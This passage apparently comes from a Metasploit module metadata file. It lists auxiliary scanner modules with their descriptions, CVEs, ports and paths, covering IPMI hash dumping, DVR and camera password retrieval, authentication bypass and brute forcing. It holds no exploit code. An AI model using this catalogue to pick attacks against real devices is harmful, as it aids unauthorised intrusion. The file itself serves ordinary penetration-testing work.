"description": "A vulnerability in Internet Key Exchange version 1 (IKEv1) packet\n processing code in Cisco IOS, Cisco IOS XE, and Cisco IOS XR Software\n could allow an unauthenticated, remote attacker to retrieve memory\n contents, which could lead to the disclosure of confidential information.\n\n The vulnerability is due to insufficient condition checks in the part\n of the code that handles IKEv1 security negotiation requests.\n An attacker could exploit this vulnerability by sending a crafted IKEv1\n packet to an affected device configured to accept IKEv1 security\n negotiation requests. A successful exploit could allow the attacker\n to retrieve memory contents, which could lead to the disclosure of\n confidential information.",
"references": [
"CVE-2016-6415",
"URL-https://github.com/adamcaudill/EquationGroupLeak/tree/master/Firewall/TOOLS/BenignCertain/benigncertain-v1110",
"URL-https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20160916-ikev1",
"URL-https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-6415",
"URL-https://musalbas.com/2016/08/18/equation-group-benigncertain.html"
],
"platform": "",
"arch": "",
"rport": 500,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/ike/cisco_ike_benigncertain.rb",
"is_install_path": true,
"ref_name": "scanner/ike/cisco_ike_benigncertain",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/imap/imap_version": {
"name": "IMAP4 Banner Grabber",
"full_name": "auxiliary/scanner/imap/imap_version",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"hdm <x@hdm.io>"
],
"description": "IMAP4 Banner Grabber",
"references": [
],
"platform": "",
"arch": "",
"rport": 143,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/imap/imap_version.rb",
"is_install_path": true,
"ref_name": "scanner/imap/imap_version",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/ip/ipidseq": {
"name": "IPID Sequence Scanner",
"full_name": "auxiliary/scanner/ip/ipidseq",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"kris katterjohn <katterjohn@gmail.com>"
],
"description": "This module will probe hosts' IPID sequences and classify\n them using the same method Nmap uses when it's performing\n its IPID Idle Scan (-sI) and OS Detection (-O).\n\n Nmap's probes are SYN/ACKs while this module's are SYNs.\n While this does not change the underlying functionality,\n it does change the chance of whether or not the probe\n will be stopped by a firewall.\n\n Nmap's Idle Scan can use hosts whose IPID sequences are\n classified as \"Incremental\" or \"Broken little-endian incremental\".",
"references": [
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/ip/ipidseq.rb",
"is_install_path": true,
"ref_name": "scanner/ip/ipidseq",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/ipmi/ipmi_cipher_zero": {
"name": "IPMI 2.0 Cipher Zero Authentication Bypass Scanner",
"full_name": "auxiliary/scanner/ipmi/ipmi_cipher_zero",
"rank": 300,
"disclosure_date": "2013-06-20",
"type": "auxiliary",
"author": [
"Dan Farmer <zen@fish2.com>",
"hdm <x@hdm.io>"
],
"description": "This module identifies IPMI 2.0-compatible systems that are vulnerable\n to an authentication bypass vulnerability through the use of cipher\n zero.",
"references": [
"CVE-2013-4782",
"URL-http://fish2.com/ipmi/cipherzero.html",
"OSVDB-93038",
"OSVDB-93039",
"OSVDB-93040"
],
"platform": "",
"arch": "",
"rport": 623,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/ipmi/ipmi_cipher_zero.rb",
"is_install_path": true,
"ref_name": "scanner/ipmi/ipmi_cipher_zero",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/ipmi/ipmi_dumphashes": {
"name": "IPMI 2.0 RAKP Remote SHA1 Password Hash Retrieval",
"full_name": "auxiliary/scanner/ipmi/ipmi_dumphashes",
"rank": 300,
"disclosure_date": "2013-06-20",
"type": "auxiliary",
"author": [
"Dan Farmer <zen@fish2.com>",
"hdm <x@hdm.io>"
],
"description": "This module identifies IPMI 2.0-compatible systems and attempts to retrieve the\n HMAC-SHA1 password hashes of default usernames. The hashes can be stored in a\n file using the OUTPUT_FILE option and then cracked using hmac_sha1_crack.rb\n in the tools subdirectory as well hashcat (cpu) 0.46 or newer using type 7300.",
"references": [
"URL-http://fish2.com/ipmi/remote-pw-cracking.html",
"URL-https://seclists.org/bugtraq/2014/Apr/16",
"CVE-2013-4786",
"OSVDB-95057",
"BID-61076"
],
"platform": "",
"arch": "",
"rport": 623,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2018-09-15 18:54:45 +0000",
"path": "/modules/auxiliary/scanner/ipmi/ipmi_dumphashes.rb",
"is_install_path": true,
"ref_name": "scanner/ipmi/ipmi_dumphashes",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_scanner/ipmi/ipmi_version": {
"name": "IPMI Information Discovery",
"full_name": "auxiliary/scanner/ipmi/ipmi_version",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Dan Farmer <zen@fish2.com>",
"hdm <x@hdm.io>"
],
"description": "Discover host information through IPMI Channel Auth probes",
"references": [
"URL-http://fish2.com/ipmi/"
],
"platform": "",
"arch": "",
"rport": 623,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/ipmi/ipmi_version.rb",
"is_install_path": true,
"ref_name": "scanner/ipmi/ipmi_version",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/jenkins/jenkins_udp_broadcast_enum": {
"name": "Jenkins Server Broadcast Enumeration",
"full_name": "auxiliary/scanner/jenkins/jenkins_udp_broadcast_enum",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Adam Compton <adam_compton@rapid7.com>",
"Matt Schmidt <matt_schmidt@rapid7.com>"
],
"description": "This module sends out a udp broadcast packet querying for\n any Jenkins servers on the local network.\n Be advised that while this module does not identify the\n port on which Jenkins is running, the default port for\n Jenkins is 8080.",
"references": [
"URL-https://wiki.jenkins-ci.org/display/JENKINS/Auto-discovering+Jenkins+on+the+network"
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2019-03-05 04:43:37 +0000",
"path": "/modules/auxiliary/scanner/jenkins/jenkins_udp_broadcast_enum.rb",
"is_install_path": true,
"ref_name": "scanner/jenkins/jenkins_udp_broadcast_enum",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/kademlia/server_info": {
"name": "Gather Kademlia Server Information",
"full_name": "auxiliary/scanner/kademlia/server_info",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Jon Hart <jon_hart@rapid7.com>"
],
"description": "This module uses the Kademlia BOOTSTRAP and PING messages to identify\n and extract information from Kademlia speaking UDP endpoints,\n typically belonging to eMule/eDonkey/BitTorrent servers or other P2P\n applications.",
"references": [
"URL-http://gbmaster.wordpress.com/2013/06/16/botnets-surrounding-us-sending-kademlia2_bootstrap_req-kademlia2_hello_req-and-their-strict-cousins/#more-125"
],
"platform": "",
"arch": "",
"rport": 4672,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/kademlia/server_info.rb",
"is_install_path": true,
"ref_name": "scanner/kademlia/server_info",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/llmnr/query": {
"name": "LLMNR Query",
"full_name": "auxiliary/scanner/llmnr/query",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Jon Hart <jon_hart@rapid7.com>"
],
"description": "This module sends LLMNR queries, which are really just normal UDP DNS\n queries done (usually) over multicast on a different port, 5355.\n Targets other than the default RHOSTS' 224.0.0.252 should not respond\n but may anyway.",
"references": [
],
"platform": "",
"arch": "",
"rport": 5355,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/llmnr/query.rb",
"is_install_path": true,
"ref_name": "scanner/llmnr/query",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/lotus/lotus_domino_hashes": {
"name": "Lotus Domino Password Hash Collector",
"full_name": "auxiliary/scanner/lotus/lotus_domino_hashes",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Tiago Ferreira <tiago.ccna@gmail.com>"
],
"description": "Get users passwords hashes from names.nsf page",
"references": [
"CVE-2007-0977"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2018-08-21 08:50:26 +0000",
"path": "/modules/auxiliary/scanner/lotus/lotus_domino_hashes.rb",
"is_install_path": true,
"ref_name": "scanner/lotus/lotus_domino_hashes",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/lotus/lotus_domino_login": {
"name": "Lotus Domino Brute Force Utility",
"full_name": "auxiliary/scanner/lotus/lotus_domino_login",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Tiago Ferreira <tiago.ccna@gmail.com>"
],
"description": "Lotus Domino Authentication Brute Force Utility",
"references": [
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/lotus/lotus_domino_login.rb",
"is_install_path": true,
"ref_name": "scanner/lotus/lotus_domino_login",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/lotus/lotus_domino_version": {
"name": "Lotus Domino Version",
"full_name": "auxiliary/scanner/lotus/lotus_domino_version",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"CG <cg@carnal0wnage.com>"
],
"description": "Several checks to determine Lotus Domino Server Version.",
"references": [
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/lotus/lotus_domino_version.rb",
"is_install_path": true,
"ref_name": "scanner/lotus/lotus_domino_version",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/mdns/query": {
"name": "mDNS Query",
"full_name": "auxiliary/scanner/mdns/query",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Jon Hart <jon_hart@rapid7.com>"
],
"description": "This module sends mDNS queries, which are really just normal UDP DNS\n queries done (usually) over multicast on a different port, 5353.",
"references": [
],
"platform": "",
"arch": "",
"rport": 5353,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/mdns/query.rb",
"is_install_path": true,
"ref_name": "scanner/mdns/query",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/memcached/memcached_amp": {
"name": "Memcached Stats Amplification Scanner",
"full_name": "auxiliary/scanner/memcached/memcached_amp",
"rank": 300,
"disclosure_date": "2018-02-27",
"type": "auxiliary",
"author": [
"Marek Majkowski",
"xistence <xistence@0x90.nl>",
"Jon Hart <jon_hart@rapid7.com>"
],
"description": "This module can be used to discover Memcached servers which expose the\n unrestricted UDP port 11211. A basic \"stats\" request is executed to check\n if an amplification attack is possible against a third party.",
"references": [
"URL-https://blog.cloudflare.com/memcrashed-major-amplification-attacks-from-port-11211/",
"CVE-2018-1000115"
],
"platform": "",
"arch": "",
"rport": 11211,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2018-03-06 16:04:00 +0000",
"path": "/modules/auxiliary/scanner/memcached/memcached_amp.rb",
"is_install_path": true,
"ref_name": "scanner/memcached/memcached_amp",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/memcached/memcached_udp_version": {
"name": "Memcached UDP Version Scanner",
"full_name": "auxiliary/scanner/memcached/memcached_udp_version",
"rank": 300,
"disclosure_date": "2003-07-23",
"type": "auxiliary",
"author": [
"Jon Hart <jon_hart@rapid7.com>"
],
"description": "This module can be used to discover Memcached servers which expose the\n unrestricted UDP port 11211. A basic \"version\" request is executed to obtain\n the version of memcached.",
"references": [
"URL-https://github.com/memcached/memcached/blob/master/doc/protocol.txt"
],
"platform": "",
"arch": "",
"rport": 11211,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2018-03-06 18:16:22 +0000",
"path": "/modules/auxiliary/scanner/memcached/memcached_udp_version.rb",
"is_install_path": true,
"ref_name": "scanner/memcached/memcached_udp_version",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/misc/cctv_dvr_login": {
"name": "CCTV DVR Login Scanning Utility",
"full_name": "auxiliary/scanner/misc/cctv_dvr_login",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Justin Cacak"
],
"description": "This module tests for standalone CCTV DVR video surveillance\n deployments specifically by MicroDigital, HIVISION, CTRing, and\n numerous other rebranded devices that are utilizing default vendor\n passwords. Additionally, this module has the ability to brute\n force user accounts.\n\n Such CCTV DVR video surveillance deployments support remote\n viewing through Central Management Software (CMS) via the\n CMS Web Client, an IE ActiveX control hosted over HTTP, or\n through Win32 or mobile CMS client software. By default,\n remote authentication is handled over port 5920/TCP with video\n streaming over 5921/TCP.\n\n After successful authentication over 5920/TCP this module\n will then attempt to determine if the IE ActiveX control\n is listening on the default HTTP port (80/TCP).",
"references": [
],
"platform": "",
"arch": "",
"rport": 5920,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/misc/cctv_dvr_login.rb",
"is_install_path": true,
"ref_name": "scanner/misc/cctv_dvr_login",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/misc/cisco_smart_install": {
"name": "Identify Cisco Smart Install endpoints",
"full_name": "auxiliary/scanner/misc/cisco_smart_install",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Jon Hart <jon_hart@rapid7.com>",
"Mumbai"
],
"description": "This module attempts to connect to the specified Cisco Smart Install port\n and determines if it speaks the Smart Install Protocol. Exposure of SMI\n to untrusted networks can allow complete compromise of the switch.",
"references": [
"URL-https://blog.talosintelligence.com/2017/02/cisco-coverage-for-smart-install-client.html",
"URL-https://blogs.cisco.com/security/cisco-psirt-mitigating-and-detecting-potential-abuse-of-cisco-smart-install-feature",
"URL-https://tools.cisco.com/security/center/content/CiscoSecurityResponse/cisco-sr-20170214-smi",
"URL-https://github.com/Cisco-Talos/smi_check",
"URL-https://github.com/Sab0tag3d/SIET"
],
"platform": "",
"arch": "",
"rport": 4786,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-11-21 21:33:29 +0000",
"path": "/modules/auxiliary/scanner/misc/cisco_smart_install.rb",
"is_install_path": true,
"ref_name": "scanner/misc/cisco_smart_install",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/misc/clamav_control": {
"name": "ClamAV Remote Command Transmitter",
"full_name": "auxiliary/scanner/misc/clamav_control",
"rank": 300,
"disclosure_date": "2016-06-08",
"type": "auxiliary",
"author": [
"Alejandro Hdeza",
"bwatters-r7",
"wvu <wvu@metasploit.com>"
],
"description": "In certain configurations, ClamAV will bind to all addresses and listen for commands.\n This module sends properly-formatted commands to the ClamAV daemon if it is in such a\n configuration.",
"references": [
"URL-https://twitter.com/nitr0usmx/status/740673507684679680/photo/1",
"URL-https://github.com/vrtadmin/clamav-faq/raw/master/manual/clamdoc.pdf"
],
"platform": "",
"arch": "",
"rport": 3310,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2018-11-16 12:18:28 +0000",
"path": "/modules/auxiliary/scanner/misc/clamav_control.rb",
"is_install_path": true,
"ref_name": "scanner/misc/clamav_control",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/misc/dahua_dvr_auth_bypass": {
"name": "Dahua DVR Auth Bypass Scanner",
"full_name": "auxiliary/scanner/misc/dahua_dvr_auth_bypass",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Tyler Bennett - Talos Consulting",
"Jake Reynolds - Depth Security",
"Jon Hart <jon_hart@rapid7.com>",
"Nathan McBride"
],
"description": "Scans for Dahua-based DVRs and then grabs settings. Optionally resets a user's password and clears the device logs",
"references": [
"CVE-2013-6117",
"URL-https://depthsecurity.com/blog/dahua-dvr-authentication-bypass-cve-2013-6117"
],
"platform": "",
"arch": "",
"rport": 37777,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2019-03-05 03:38:51 +0000",
"path": "/modules/auxiliary/scanner/misc/dahua_dvr_auth_bypass.rb",
"is_install_path": true,
"ref_name": "scanner/misc/dahua_dvr_auth_bypass",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/misc/dvr_config_disclosure": {
"name": "Multiple DVR Manufacturers Configuration Disclosure",
"full_name": "auxiliary/scanner/misc/dvr_config_disclosure",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Alejandro Ramos",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module takes advantage of an authentication bypass vulnerability at the\n web interface of multiple manufacturers DVR systems, which allows to retrieve the\n device configuration.",
"references": [
"CVE-2013-1391",
"URL-http://www.securitybydefault.com/2013/01/12000-grabadores-de-video-expuestos-en.html"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/misc/dvr_config_disclosure.rb",
"is_install_path": true,
"ref_name": "scanner/misc/dvr_config_disclosure",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/misc/easycafe_server_fileaccess": {
"name": "EasyCafe Server Remote File Access",
"full_name": "auxiliary/scanner/misc/easycafe_server_fileaccess",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"R-73eN",
"bcoles <bcoles@gmail.com>"
],
"description": "This module exploits a file retrieval vulnerability in\n EasyCafe Server. The vulnerability can be triggered by\n sending a specially crafted packet (opcode 0x43) to the\n 831/TCP port.\n This module has been successfully tested on EasyCafe Server\n version 2.2.14 (Trial mode and Demo mode) on Windows XP SP3\n and Windows 7 SP1.\n Note that the server will throw a popup messagebox if the\n specified file does not exist.",
"references": [
"EDB-39102"
],
"platform": "",
"arch": "",
"rport": 831,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2019-01-10 19:19:14 +0000",
"path": "/modules/auxiliary/scanner/misc/easycafe_server_fileaccess.rb",
"is_install_path": true,
"ref_name": "scanner/misc/easycafe_server_fileaccess",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/misc/ib_service_mgr_info": {
"name": "Borland InterBase Services Manager Information",
"full_name": "auxiliary/scanner/misc/ib_service_mgr_info",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Ramon de C Valle <rcvalle@metasploit.com>",
"Adriano Lima <adriano@risesecurity.org>"
],
"description": "This module retrieves version of the services manager, version\n and implementation of the InterBase server from InterBase\n Services Manager.",
"references": [
],
"platform": "",
"arch": "",
"rport": 3050,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/misc/ib_service_mgr_info.rb",
"is_install_path": true,
"ref_name": "scanner/misc/ib_service_mgr_info",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/misc/ibm_mq_channel_brute": {
"name": "IBM WebSphere MQ Channel Name Bruteforce",
"full_name": "auxiliary/scanner/misc/ibm_mq_channel_brute",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Petros Koutroumpis"
],
"description": "This module uses a dictionary to bruteforce MQ channel names. For all identified channels it also returns if SSL is used and whether it is a server-connection channel.",
"references": [
],
"platform": "",
"arch": "",
"rport": 1414,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2018-11-20 16:24:17 +0000",
"path": "/modules/auxiliary/scanner/misc/ibm_mq_channel_brute.rb",
"is_install_path": true,
"ref_name": "scanner/misc/ibm_mq_channel_brute",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/misc/ibm_mq_enum": {
"name": "Identify Queue Manager Name and MQ Version",
"full_name": "auxiliary/scanner/misc/ibm_mq_enum",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Petros Koutroumpis"
],
"description": "Run this auxiliary against the listening port of an IBM MQ Queue Manager to identify its name and version. Any channel type can be used to get this information as long as the name of the channel is valid.",
"references": [
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2018-11-21 16:09:18 +0000",
"path": "/modules/auxiliary/scanner/misc/ibm_mq_enum.rb",
"is_install_path": true,
"ref_name": "scanner/misc/ibm_mq_enum",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/misc/ibm_mq_login": {
"name": "IBM WebSphere MQ Login Check",
"full_name": "auxiliary/scanner/misc/ibm_mq_login",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Petros Koutroumpis"
],
"description": "This module can be used to bruteforce usernames that can be used to connect to a queue manager. The name of a valid server-connection channel without SSL configured is required, as well as a list of usernames to try.",
"references": [
],
"platform": "",
"arch": "",
"rport": 1414,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2018-11-29 17:29:05 +0000",
"path": "/modules/auxiliary/scanner/misc/ibm_mq_login.rb",
"is_install_path": true,
"ref_name": "scanner/misc/ibm_mq_login",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/misc/java_jmx_server": {
"name": "Java JMX Server Insecure Endpoint Code Execution Scanner",
"full_name": "auxiliary/scanner/misc/java_jmx_server",
"rank": 300,
"disclosure_date": "2013-05-22",
"type": "auxiliary",
"author": [
"rocktheboat"
],
"description": "Detect Java JMX endpoints",
"references": [
"URL-https://docs.oracle.com/javase/8/docs/technotes/guides/jmx/JMX_1_4_specification.pdf",
"URL-https://www.optiv.com/blog/exploiting-jmx-rmi",
"CVE-2015-2342"
],
"platform": "Java",
"arch": "",
"rport": 1099,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2018-12-19 12:56:53 +0000",
"path": "/modules/auxiliary/scanner/misc/java_jmx_server.rb",
"is_install_path": true,
"ref_name": "scanner/misc/java_jmx_server",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/misc/java_rmi_server": {
"name": "Java RMI Server Insecure Endpoint Code Execution Scanner",
"full_name": "auxiliary/scanner/misc/java_rmi_server",
"rank": 300,
"disclosure_date": "2011-10-15",
"type": "auxiliary",
"author": [
"mihi",
"hdm <x@hdm.io>"
],
"description": "Detect Java RMI endpoints",
"references": [
"URL-http://download.oracle.com/javase/1.3/docs/guide/rmi/spec/rmi-protocol.html",
"URL-http://www.securitytracker.com/id?1026215",
"CVE-2011-3556"
],
"platform": "",
"arch": "",
"rport": 1099,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/misc/java_rmi_server.rb",
"is_install_path": true,
"ref_name": "scanner/misc/java_rmi_server",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/misc/oki_scanner": {
"name": "OKI Printer Default Login Credential Scanner",
"full_name": "auxiliary/scanner/misc/oki_scanner",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"antr6X <anthr6x@gmail.com>"
],
"description": "This module scans for OKI printers via SNMP, then tries to connect to found devices\n with vendor default administrator credentials via HTTP authentication. By default, OKI\n network printers use the last six digits of the MAC as admin password.",
"references": [
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/misc/oki_scanner.rb",
"is_install_path": true,
"ref_name": "scanner/misc/oki_scanner",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/misc/poisonivy_control_scanner": {
"name": "Poison Ivy Command and Control Scanner",
"full_name": "auxiliary/scanner/misc/poisonivy_control_scanner",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"SeawolfRN"
],
"description": "Enumerate Poison Ivy Command and Control (C&C) on ports 3460, 80, 8080 and 443. Adaptation of iTrust Python script.",
"references": [
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/misc/poisonivy_control_scanner.rb",
"is_install_path": true,
"ref_name": "scanner/misc/poisonivy_control_scanner",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/misc/raysharp_dvr_passwords": {
"name": "Ray Sharp DVR Password Retriever",
"full_name": "auxiliary/scanner/misc/raysharp_dvr_passwords",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"someluser",
"hdm <x@hdm.io>"
],
"description": "This module takes advantage of a protocol design issue with the\n Ray Sharp based DVR systems. It is possible to retrieve the username and\n password through the TCP service running on port 9000. Other brands using\n this platform and exposing the same issue may include Swann, Lorex,\n Night Owl, Zmodo, URMET, and KGuard Security.",
"references": [
"URL-http://console-cowboys.blogspot.com/2013/01/swann-song-dvr-insecurity.html"
],
"platform": "",
"arch": "",
"rport": 9000,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/misc/raysharp_dvr_passwords.rb",
"is_install_path": true,
"ref_name": "scanner/misc/raysharp_dvr_passwords",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/misc/rosewill_rxs3211_passwords": {
"name": "Rosewill RXS-3211 IP Camera Password Retriever",
"full_name": "auxiliary/scanner/misc/rosewill_rxs3211_passwords",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Ben Schmidt"
],
"description": "This module takes advantage of a protocol design issue with the Rosewill admin\n executable in order to retrieve passwords, allowing remote attackers to take\n administrative control over the device. Other similar IP Cameras such as Edimax,\n Hawking, Zonet, etc, are also believed to have the same flaw, but not fully tested.\n The protocol design issue also allows attackers to reset passwords on the device.",
"references": [
],
"platform": "",
"arch": "",
"rport": 13364,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-08-26 21:01:10 +0000",
"path": "/modules/auxiliary/scanner/misc/rosewill_rxs3211_passwords.rb",
"is_install_path": true,
"ref_name": "scanner/misc/rosewill_rxs3211_passwords",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/misc/sercomm_backdoor_scanner": {
"name": "SerComm Network Device Backdoor Detection",
"full_name": "auxiliary/scanner/misc/sercomm_backdoor_scanner",
"rank": 300,
"disclosure_date": "2013-12-31",
"type": "auxiliary",
"author": [
"Eloi Vanderbeken <eloi.vanderbeken@gmail.com>",
"Matt \"hostess\" Andreko <mandreko@accuvant.com>"
],
"description": "This module can identify SerComm manufactured network devices which\n contain a backdoor, allowing command injection or account disclosure.",
"references": [
"CVE-2014-0659",
"OSVDB-101653",
"URL-https://github.com/elvanderb/TCP-32764"
],
"platform": "",
"arch": "",
"rport": 32764,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/misc/sercomm_backdoor_scanner.rb",
"is_install_path": true,
"ref_name": "scanner/misc/sercomm_backdoor_scanner",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/misc/sunrpc_portmapper": {
"name": "SunRPC Portmap Program Enumerator",
"full_name": "auxiliary/scanner/misc/sunrpc_portmapper",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"tebo <tebo@attackresearch.com>"
],
"description": "This module calls the target portmap service and enumerates all program\n entries and their running port numbers.",
"references": [
"URL-http://www.ietf.org/rfc/rfc1057.txt"
],
"platform": "",
"arch": "",
"rport": 111,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
